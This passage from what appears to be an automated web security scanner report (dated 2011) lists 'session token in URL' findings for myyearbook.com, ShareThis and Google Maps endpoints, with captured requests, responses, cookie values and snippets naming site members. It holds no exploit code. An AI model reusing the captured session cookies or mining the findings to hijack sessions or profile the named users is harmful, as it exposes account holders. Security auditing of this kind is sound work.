Confidence:   Firm
Host:   http://games.myyearbook.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: games.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; navbar-click=games

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:15 GMT
Server: Apache
Set-Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
Set-Cookie: mcim=deleted; expires=Wed, 21-Jul-2010 18:00:14 GMT; path=/; domain=.myyearbook.com
Set-Cookie: meeboCIM672=deleted; expires=Wed, 21-Nov-3010 18:00:15 GMT; path=/; domain=.myyearbook.com
Set-Cookie: navbar-click=deleted; expires=Wed, 21-Jul-2010 18:00:14 GMT; path=/; domain=.myyearbook.com
Cache-control: no-cache
Pragma: no-cache
Content-Length: 44747
Connection: close
Content-Type: text/html; charset=UTF-8;
X-MyPoolMember: 10.10.10.236


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2002/REC-xhtml1-20020801/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http:/
...[SNIP]...
<li class="profileMenu" data-id="profile">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGU=">
Profile
</a>
...[SNIP]...
<li id="reportIcon" class="headerSprite" data-id="reportabuse">
<a href="http://www.myyearbook.com/?mysession=bGlzdGluZ19ib2d1cw==">
Report
</a>
...[SNIP]...
<li data-id="signup">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0w">Sign Up</a>
...[SNIP]...
<li data-id="login"><a href="http://www.myyearbook.com//?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0wJm9sZD0x">Login</a>
...[SNIP]...
<li data-id="browsepeople">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaF9yZXN1bHRzX2FkdmFuY2VkJnNlYXJjaHR5cGU9QkFTSUMmZmlyc3RwYWdlPXk=">
Browse People
</a>
...[SNIP]...
<li data-id="namesearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPU5BTUU=">
Name Search
</a>
...[SNIP]...
<li data-id="emailsearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPUVNQUlM">
Email Search
</a>
...[SNIP]...
<li data-id="schoolsearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPVlFQVJCT09L">
School Search
</a>
...[SNIP]...
<li data-id="advancedsearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaF9yZXN1bHRzX2FkdmFuY2VkJnNlYXJjaHR5cGU9QURWQU5DRUQmZmlyc3RwYWdlPXk=">
Advanced Search
</a>
...[SNIP]...
<li data-id="myphotos">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX215cGljdHVyZXM=">
My Photos
</a>
...[SNIP]...
<li data-id="myautographs">
<a href="http://www.myyearbook.com/?mysession=bGlzdGluZ192aWV3X2F1dG9ncmFwaHM=">
My Autographs
</a>
...[SNIP]...
<li data-id="mystickers">
<a href="http://www.myyearbook.com/?mysession=c3RpY2tlcnNfdmlld2FsbHN0aWNrZXJz=">
My Stickers
</a>
...[SNIP]...
<li data-id="myflirts">
<a href="http://www.myyearbook.com/?mysession=ZmxpcnRzX3ZpZXdGbGlydHM=">
My Flirts
</a>
...[SNIP]...
<li data-id="whateveriwant">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3doYXRldmVyaXdhbnQ=">
Whatever I Want
</a>
...[SNIP]...
<li data-id="myvideos">
<a href="http://www.myyearbook.com/?mysession=dmlkZW9fdXNlcg==">
My Videos
</a>
...[SNIP]...
<li data-id="myblog">
<a href="http://www.myyearbook.com/?mysession=YmxvZ3NfYmxvZw==">
My Blog
</a>
...[SNIP]...
<li class="navbar_battles" data-id="battles"><a href="http://www.myyearbook.com/?mysession=YmF0dGxlc192b3RlX2JhdHRsZQ==">Battles</a></li><li class="navbar_mymag" data-id="mymag"><a href="http://www.myyearbook.com/?mysession=bWFnX2luZGV4">myMag</a>
...[SNIP]...
<div class="message">To enjoy some of the benefits of Games, you must be registered with myYearbook. Please <a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0w">register</a> or <a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0wJm9sZD0x">log in</a>
...[SNIP]...
<td class="thumb"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI5Nzk0MDA4"><img src="http://content1.myyearbook.com/thumb_userimages/mini/2011/02/08/15/thm_phpKdbNWy.jpg"/>
...[SNIP]...
<td class="details" style="clear:"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI5Nzk0MDA4">sam sam</a>
...[SNIP]...
<td class="thumb"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTg5OTAzNjc="><img src="http://content1.myyearbook.com/thumb_userimages/mini/2009/07/07/16/thm_thm_phpUHyFBn.jpg"/>
...[SNIP]...
<td class="details" style="clear:"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTg5OTAzNjc=">Adrian,BIO,outlaw,ANR Theoret</a>
...[SNIP]...
<td class="thumb"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIyMjA0NTY0"><img src="http://content1.myyearbook.com/thumb_userimages/mini/2011/06/29/18/thm_php2jwE4u.jpg"/>
...[SNIP]...
<td class="details" style="clear:"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIyMjA0NTY0">Liana Nicole</a>
...[SNIP]...
<td class="thumb"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTExMTM2MjY3"><img src="http://content1.myyearbook.com/thumb_userimages/mini/2011/07/08/19/thm_phpNnlsgm.jpg"/>
...[SNIP]...
<td class="details" style="clear:"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTExMTM2MjY3">tera for you to ask</a>
...[SNIP]...

8.4. http://games.myyearbook.com/landing/pool  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://games.myyearbook.com
Path:   /landing/pool

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /landing/pool HTTP/1.1
Host: games.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg; __utmv=138725551.|1=gender=unknown=1; scorecardresearch=1964828935-258875400-1311271308286

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:41:29 GMT
Server: Apache
Set-Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
Set-Cookie: mcim=deleted; expires=Wed, 21-Jul-2010 18:41:28 GMT; path=/; domain=.myyearbook.com
Set-Cookie: meeboCIM672=deleted; expires=Wed, 21-Nov-3010 18:41:29 GMT; path=/; domain=.myyearbook.com
Set-Cookie: navbar-click=deleted; expires=Wed, 21-Jul-2010 18:41:28 GMT; path=/; domain=.myyearbook.com
Cache-control: no-cache
Pragma: no-cache
Content-Length: 60975
Connection: close
Content-Type: text/html; charset=UTF-8;
X-MyPoolMember: 10.10.10.239


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2002/REC-xhtml1-20020801/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http:/
...[SNIP]...
<li class="profileMenu" data-id="profile">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGU=">
Profile
</a>
...[SNIP]...
<li id="reportIcon" class="headerSprite" data-id="reportabuse">
<a href="http://www.myyearbook.com/?mysession=bGlzdGluZ19ib2d1cw==">
Report
</a>
...[SNIP]...
<li data-id="signup">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0w">Sign Up</a>
...[SNIP]...
<li data-id="login"><a href="http://www.myyearbook.com//?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0wJm9sZD0x">Login</a>
...[SNIP]...
<li data-id="browsepeople">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaF9yZXN1bHRzX2FkdmFuY2VkJnNlYXJjaHR5cGU9QkFTSUMmZmlyc3RwYWdlPXk=">
Browse People
</a>
...[SNIP]...
<li data-id="namesearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPU5BTUU=">
Name Search
</a>
...[SNIP]...
<li data-id="emailsearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPUVNQUlM">
Email Search
</a>
...[SNIP]...
<li data-id="schoolsearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPVlFQVJCT09L">
School Search
</a>
...[SNIP]...
<li data-id="advancedsearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaF9yZXN1bHRzX2FkdmFuY2VkJnNlYXJjaHR5cGU9QURWQU5DRUQmZmlyc3RwYWdlPXk=">
Advanced Search
</a>
...[SNIP]...
<li data-id="myphotos">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX215cGljdHVyZXM=">
My Photos
</a>
...[SNIP]...
<li data-id="myautographs">
<a href="http://www.myyearbook.com/?mysession=bGlzdGluZ192aWV3X2F1dG9ncmFwaHM=">
My Autographs
</a>
...[SNIP]...
<li data-id="mystickers">
<a href="http://www.myyearbook.com/?mysession=c3RpY2tlcnNfdmlld2FsbHN0aWNrZXJz=">
My Stickers
</a>
...[SNIP]...
<li data-id="myflirts">
<a href="http://www.myyearbook.com/?mysession=ZmxpcnRzX3ZpZXdGbGlydHM=">
My Flirts
</a>
...[SNIP]...
<li data-id="whateveriwant">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3doYXRldmVyaXdhbnQ=">
Whatever I Want
</a>
...[SNIP]...
<li data-id="myvideos">
<a href="http://www.myyearbook.com/?mysession=dmlkZW9fdXNlcg==">
My Videos
</a>
...[SNIP]...
<li data-id="myblog">
<a href="http://www.myyearbook.com/?mysession=YmxvZ3NfYmxvZw==">
My Blog
</a>
...[SNIP]...
<li class="navbar_battles" data-id="battles"><a href="http://www.myyearbook.com/?mysession=YmF0dGxlc192b3RlX2JhdHRsZQ==">Battles</a></li><li class="navbar_mymag" data-id="mymag"><a href="http://www.myyearbook.com/?mysession=bWFnX2luZGV4">myMag</a>
...[SNIP]...
<td valign="middle">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM1MjkwMzAy">
<img class="photo" style="padding-right:8px;" src="http://content1.myyearbook.com/thumb_userimages/mini/2011/07/18/06/thm_phpFMLQAm.jpg"/>
...[SNIP]...
<td class="details123">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM1MjkwMzAy">mark streeter</a>
...[SNIP]...
<td>
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM1MjgxODc0">
<img src="http://content1.myyearbook.com/thumb_userimages/mini/2011/07/17/23/thm_phpW7Vrvq.jpg"/>
...[SNIP]...
<div class="container">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM1MjgxODc0">Ms. Janine</a>
...[SNIP]...
<td>
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI5NzM2MDAy">
<img src="http://content1.myyearbook.com/thumb_userimages/mini/2011/07/18/02/thm_phplc5T9V.jpg"/>
...[SNIP]...
<div class="container">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI5NzM2MDAy">Alyssa Ash</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTY4MTQ3MTI=">*~Teena Ann~*</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI5NzEyMDg3">perley murray</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI0OTU3Mjgx">Mike A</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM1MDcxMTUx">kylee masterson</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTE4ODI4Njgz">MC B Baby :P</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTEyOTA2ODAw">andy zenitram</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTEzNzcwNjc5">JeanPaul Sollars</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTMwMjc3ODk4">Ian m</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI1NDU3MDgz">Doc Harshman</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIzMjQ2NzQx">Jas..n ...ruck ...anati...&amp;#123;Doesnt Vote&amp;#125;o=0~</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIzOTA4NjIz">000~Yasmin~ Yasmin~</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIwNDY4NTU=">O.C.-Ztyle 713</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI1NjQ2MjU4">Tim Boylen</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM0ODkwOTY1">Roy Perry</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM0MzQzMzQ5">James Crachiolo</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTMzNTUyMDQx">SKULLY LIVES</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTMzNDIxOTUz">Govind Saini</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIzNTI5MDI2">glenn tan</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTMzOTEyNzk2">Geo M</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIxMjM2NDcy">Gary leftrook</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM0MDA3Mzgw">donna santos</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTMyNDcyMTEy">Julie Gonzalez</a>
...[SNIP]...
<td colspan="2" class="logged_out">To enjoy some of the benefits of Games, you must be registered with myYearbook. Please <a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0w">register</a> or <a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0wJm9sZD0x">log in</a>
...[SNIP]...
<td colspan="2" class="logged_out">To enjoy some of the benefits of Games, you must be registered with myYearbook. Please <a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0w">register</a> or <a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0wJm9sZD0x">log in</a>
...[SNIP]...

8.5. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&publisher=218be740-0231-4c2d-8b14-b2efe5b83b72&hostname=www.uscgnews.com&location=%2Fgo%2Fdoc%2F786%2F1135035%2F&url=http%3A%2F%2Fwww.uscgnews.com%2Fgo%2Fdoc%2F786%2F1135035%2F&sessionID=1311370085431.55259&fpc=e9b43fc-13153bf8437-16a3dde3-1&ts1311370085768.0&r_sessionID=&hash_flag=&shr=&count=1&refDomain=www.fakereferrerdominator.com&refQuery=RefParName%3DRefValue HTTP/1.1
Host: l.sharethis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.uscgnews.com/go/doc/786/1135035/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Fri, 22 Jul 2011 21:27:59 GMT
Connection: keep-alive


8.6. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/AuthenticationService.Authenticate

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fconsultants-locator.apple.com%2Findex.php%3Ffuseaction%3Dhome.directory%26offset%3D0%26rppg%3D8%26q%3D10010&callback=_xdc_._74pqj6&token=51515 HTTP/1.1
Host: maps.googleapis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Thu, 21 Jul 2011 20:43:11 GMT
Server: mafe
Cache-Control: private
Content-Length: 37
X-XSS-Protection: 1; mode=block

_xdc_._74pqj6 && _xdc_._74pqj6( [1] )

8.7. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/StaticMapService.GetMapImage

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/StaticMapService.GetMapImage?1m2&1i2470098&2i3152897&2e1&3u15&4m2&1u378&2u377&5m3&1e0&2b1&5sen-US&token=72762 HTTP/1.1
Host: maps.googleapis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010

Response

HTTP/1.1 200 OK
Content-Type: image/png
Date: Thu, 21 Jul 2011 20:41:30 GMT
Expires: Fri, 22 Jul 2011 20:41:30 GMT
Server: staticmap
Content-Length: 43726
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 99

.PNG
.
...IHDR...z...y.............PLTE=5-!I.%Ik5UsE)    Q).Q5.Y5!^A.MA9fA1oM=kQ!s^)k1YQIMfMYwEEbfYIf^U{^MobU{o^skfws1{.Qo.b.o....b...w9.wk.s..A....I..Q..Y..w..b..{..k..s..{.....................
...[SNIP]...

8.8. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/ViewportInfoService.GetViewportInfo

Issue detail

The URL in the request appears to contain a session token within the query string: